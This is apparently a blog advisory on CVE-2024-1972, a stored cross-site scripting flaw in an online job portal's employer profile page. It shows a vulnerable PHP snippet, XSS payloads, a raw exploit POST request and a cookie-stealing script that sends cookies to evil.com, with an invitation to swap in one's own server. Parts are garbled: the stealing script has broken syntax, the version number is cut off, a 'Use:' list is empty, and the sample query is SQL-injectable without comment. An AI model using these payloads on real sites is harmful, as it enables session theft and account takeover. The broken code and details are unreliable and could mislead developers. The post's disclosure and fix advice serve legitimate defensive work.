---
If you manage or use the SourceCodester Online Job Portal 1., there's an important security hole you need to know about. Let's break down what's going on with CVE-2024-1972, how an attacker could use it, and what you should do.
What is CVE-2024-1972?
CVE-2024-1972 is a vulnerability in the SourceCodester Online Job Portal 1.. It was found in the /Employer/EditProfile.php script. What makes this bug dangerous is that user input isn't properly filtered or sanitized. Particularly, the Address parameter can be used to inject malicious scripts into the site, causing a classic cross-site scripting (XSS) issue.
Here's what that means, in simple terms: if a user (in this case, an employer) puts dangerous JavaScript into the Address field while editing their profile, that script could run in the browser of anyone viewing the profile—potentially stealing session info, hijacking accounts, or doing other nasty things.
Original Reference
- VulDB Entry: VDB-255128
- Exploit Disclosure Page (Packet Storm)
- CVE Entry: nvd.nist.gov
Here's a simplified version showing the vulnerable logic
<?php
// /Employer/EditProfile.php
if(isset($_POST['submit'])) {
$address = $_POST['Address'];
// This line is vulnerable - no sanitization!
$query = "UPDATE employers SET address='$address' WHERE id='$employer_id'";
mysqli_query($connect, $query);
echo "Profile updated!";
}
?>
<!-- Later somewhere in the profile view -->
<p><?php echo $employer['address']; ?></p>
Notice: The $address input goes straight into the database and is echoed out in the HTML without any escaping. This is exactly where XSS attacks can happen.
Suppose you have an employer profile, and in the Address field, you type
<script>alert('XSS');</script>
The server saves this as your Address. Next time someone visits your profile (including admins!), this JavaScript will run in their browser, popping up an alert or, in a more dangerous situation, stealing their session cookie.
Here's what a raw HTTP POST would look like
POST /Employer/EditProfile.php HTTP/1.1
Host: victim-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=...
Address=<script>alert('hacked')</script>&submit=1
After submitting, the malicious script gets stored and later any user who loads your profile is at risk.
Why Is This Serious?
- No Authentication Required (in some cases): If an attacker can sign up as an employer, they can inject XSS.
Steals Cookies: Attackers can grab user session cookies and take over accounts.
- Spreads Fast: Any feature showing the Address field becomes a new launching point for the attack.
Example Exploit: Stealing Cookies
Below is a JavaScript payload which, if injected as the Address, sends document cookies to an attacker's server.
<script>
fetch('http://evil.com/steal.php?cookie='; + document.cookie);
</script>
Just replace evil.com with your own server to collect intercepted cookies.
How Can You Fix It?
Preventing this is straightforward. Always sanitize user input before storing and especially before displaying it in HTML.
Use:
For the vulnerable code above, change the display line to
<p><?php echo htmlspecialchars($employer['address'], ENT_QUOTES, 'UTF-8'); ?></p>
Developers: Patch your code as shown above.
- Users: Don’t use this version until it's patched. Contact your vendor or check forums for new releases.
Conclusion
This CVE is dangerous and easy to exploit. If you’re running any instance of SourceCodester's Online Job Portal 1., patch today! Don’t let a simple profile field become your whole site's undoing.
Stay safe!
*Exclusive post by AI Security News for 2024—adapted and explained for readers new to XSS vulnerabilities.*
References
- VulDB Entry: VDB-255128
- CVE-2024-1972 on NIST NVD
- Original Exploit Release (Packet Storm)
Timeline
Published on: 02/28/2024 22:15:26 UTC
Last modified on: 03/21/2024 02:51:50 UTC